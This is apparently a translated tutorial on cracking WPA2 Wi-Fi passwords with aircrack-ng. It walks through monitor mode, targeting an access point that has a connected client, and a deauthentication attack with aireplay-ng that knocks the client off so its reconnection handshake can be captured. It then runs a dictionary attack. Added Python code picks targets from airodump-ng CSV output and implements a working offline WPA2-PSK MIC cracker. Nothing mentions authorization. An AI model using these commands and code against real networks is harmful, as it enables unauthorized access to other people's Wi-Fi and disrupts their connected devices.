1. Kill interfering processes
airmon-ng check kill
The wireless card that is about to enter monitor mode will be disconnected from the AP it is currently associated with (network managers and wpa_supplicant are stopped so they cannot fight over the card).
2. Find the name of the wireless card
ifconfig, e.g. wlan0
3. Enter monitor mode:
airmon-ng start wlan0
If it succeeds, ifconfig shows a new monitor interface, mon0 (newer versions of airmon-ng name it wlan0mon instead; use whatever name airmon-ng prints in the steps below).
4. Scan nearby Wi-Fi
airodump-ng mon0
Once scanning, the terminal is split into two parts. Press SPACE to pause/resume the live refresh, the 'a' key cycles through display views, and the up/down arrow keys select a row for easier reading. In the default view, the upper half lists the APs found and their properties (signal strength, channel, BSSID, ESSID, and so on); the lower half lists the client machines (STATION column, showing each client's MAC) and which AP (BSSID column) each is connected to.
5. Monitor the specified AP
Stop the scan from step 4 (Ctrl-C) and run the command below instead. The scan hops channels constantly, whereas listening to one AP requires sitting on that AP's fixed channel.
airodump-ng --bssid <AP's MAC> -c <channel> -w capfile mon0
--bssid: which AP to listen to (specified by the AP's MAC)
-c: the channel that AP is on
-w: write the captured packets to files named capfile-01.cap, capfile-01.csv, ... (airodump-ng numbers them)
Note on choosing the AP:
1. In the lower part of the step 4 output, pick an AP whose BSSID appears next to at least one STATION entry. That means the AP has one or more client machines connected (the STATION column gives their MACs). Step 6 explains why this matters.
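Choosing the target can be scripted, because with -w airodump-ng also writes a CSV (capfile-01.csv) with the same AP and station tables the screen shows. The following is an added example, not code from the original page or from the aircrack-ng project: it parses a constructed CSV in airodump-ng's layout, keeps only APs that have an associated client, and prints the step 5 to 7 command lines for each one rather than running them. The interface name mon0, the file prefix capfile, the wordlist name passwd.lst and every MAC, ESSID and timestamp in the sample are assumptions.

```python
"""Pick a handshake target from an airodump-ng CSV and build the commands
for it. Added example; the sample CSV and all names in it are constructed."""
import csv
import io

# Constructed sample in airodump-ng's CSV layout: an AP table, a blank line,
# then a station table whose BSSID column names the AP each client is joined to.
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   7, HomeNet, 
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,   80,  0,   0.  0.  0.  0,   9, CoffeeWiFi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -45,  300, AA:BB:CC:DD:EE:01, HomeNet
77:88:99:AA:BB:CC, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -60,   10, (not associated), 
"""


def parse_airodump_csv(text):
    """Return (aps, stations). aps maps BSSID -> {"channel", "essid"};
    stations maps client MAC -> BSSID of the AP it is associated with.
    Clients listed as "(not associated)" are dropped."""
    aps, stations = {}, {}
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row:
            continue  # blank separator line between the two tables
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap" and len(row) >= 14:
            aps[row[0]] = {"channel": int(row[3].strip()), "essid": row[13].strip()}
        elif section == "sta" and len(row) >= 6 and row[5].strip() != "(not associated)":
            stations[row[0]] = row[5].strip()
    return aps, stations


def pick_targets(aps, stations):
    """One (bssid, channel, client_mac) tuple per associated client. APs with
    no client are skipped: with nobody to deauthenticate (step 6) there is no
    reconnection and therefore no handshake to capture."""
    return [(ap, aps[ap]["channel"], client)
            for client, ap in stations.items() if ap in aps]


def target_commands(bssid, channel, client, iface="mon0",
                    prefix="capfile", wordlist="passwd.lst"):
    """The step 5, 6 and 7 command lines for one target, returned as strings
    so they can be reviewed before anything touches the radio."""
    return [
        f"airodump-ng --bssid {bssid} -c {channel} -w {prefix} {iface}",
        f"aireplay-ng -0 2 -a {bssid} -c {client} {iface}",
        f"aircrack-ng -w {wordlist} -b {bssid} {prefix}-01.cap",
    ]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for bssid, channel, client in pick_targets(aps, stations):
        print(f"# {aps[bssid]['essid']} ({bssid}) on channel {channel}, client {client}")
        print("\n".join(target_commands(bssid, channel, client)))
```

Run against a real capfile-01.csv by replacing SAMPLE_CSV with the file contents; the second AP in the sample (CoffeeWiFi) is correctly left out because its only nearby client is not associated with it.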
6. Force a reconnection so that the handshake packets appear
Leave the airodump-ng from step 5 running and, in a second terminal, run:
aireplay-ng -0 2 -a <AP's BSSID> -c <phone's MAC> mon0
-0: attack mode 0, deauthentication
2: number of deauthentication rounds to send
-a: the Wi-Fi's BSSID
-c: the MAC of the phone connected to this Wi-Fi
The attack makes the phone and the Wi-Fi disconnect.
1. Why capture a handshake packet?
The handshake carries the material needed to test password guesses: nonces from both sides and a MIC computed with a key derived from the password. The password itself is never transmitted, but with the handshake in hand each dictionary candidate can be checked offline.
2. The handshake process:
Suppose my phone connects to the Wi-Fi. The first time, it is certainly asked to enter the password.
Phone: I want to connect to your Wi-Fi.
Wi-Fi: What is your password?
Phone: Here is my password.
Wi-Fi: Checks the password. Correct: the connection is established. Wrong: go away.
(Strictly, in WPA/WPA2 neither side sends the password; each proves it knows the key derived from it, and that proof is what the handshake contains.)
Once a phone has authenticated to the Wi-Fi, everything exchanged after the connection is ordinary Internet traffic, which is useless to capture. What we want is the handshake. So how do we make an already-authenticated connection perform the handshake again? The quickest way is to kick the phone off the network; it reconnects automatically and the handshake appears. Alternatively, wait for the phone to drop off and rejoin on its own, which also produces a handshake. This is why you must pick an AP that has a machine connected to it.
Shortly afterwards, "WPA handshake: <BSSID>" appears at the end of the first line of the airodump-ng output from step 5. If it does not appear, repeat the attack after a few minutes.
7. Run a dictionary
aircrack-ng capfile-01.cap -w passwd.lst
-w: the dictionary file. Each candidate is checked against the captured handshake offline, so nothing is sent to the network, but a password that is not in the dictionary will never be found.
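What step 7 actually does with the capture, as an added example rather than code from the original page or from aircrack-ng itself: derive the PMK from each candidate password with PBKDF2, expand it to the PTK with the two MACs and two nonces from the handshake, recompute the MIC over message 2 of the 4-way handshake with the first 16 bytes of the PTK (the KCK), and compare with the MIC in the frame. The SSID, MACs, nonces, EAPOL frame, true passphrase and wordlist below are all constructed; message 2 is generated here with the true passphrase so the example is self-contained and runs offline. It implements the WPA2-PSK key descriptor version 2 (HMAC-SHA1-128) case, which is the common CCMP configuration.

```python
"""Offline dictionary check against a captured WPA2 4-way handshake.
Added example; all handshake material below is constructed."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output, truncated to 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_frame):
    """MIC over the EAPOL-Key frame with its MIC field zeroed. The MIC sits at
    frame offset 81 (4-byte EAPOL header + 77 bytes into the key descriptor)."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(kck, snonce):
    """Constructed message 2 of the 4-way handshake (station -> AP): EAPOL
    header, RSN key descriptor with SNonce, empty key data, MIC filled in."""
    body = (b"\x02"                   # descriptor type: RSN
            + b"\x01\x0a"             # key info: MIC set, pairwise, version 2
            + b"\x00\x10"             # key length
            + b"\x00" * 7 + b"\x01"   # replay counter
            + snonce                  # 32-byte SNonce
            + b"\x00" * 16            # key IV
            + b"\x00" * 8             # key RSC
            + b"\x00" * 8             # key ID
            + b"\x00" * 16            # MIC placeholder
            + b"\x00\x00")            # key data length 0
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]


def dictionary_attack(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Recompute the MIC for each candidate password; the first candidate whose
    MIC matches the captured one is the password. Returns None if no candidate
    matches, which is exactly the "password not in dictionary" failure mode."""
    captured_mic = msg2[81:97]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


# Constructed handshake material (assumed values, not from a real capture).
SSID = "HomeNet"
AP_MAC = bytes.fromhex("aabbccddee01")
STA_MAC = bytes.fromhex("112233445566")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "correct horse"
CAPTURED_MSG2 = build_msg2(
    ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID),
                 AP_MAC, STA_MAC, ANONCE, SNONCE)[:16], SNONCE)
WORDLIST = ["password", "12345678", "correct horse", "letmein1"]

if __name__ == "__main__":
    found = dictionary_attack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST)
    print("KEY FOUND:", found if found else "not in dictionary")
```

The cost is dominated by PBKDF2 at 4096 rounds per candidate, which is why real runs use GPU-backed tools on large wordlists; the MIC comparison itself is cheap, and a handshake with a wrong or missing message 2 can never be cracked no matter how good the dictionary is.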
Aircrack-ng: capturing the handshake packet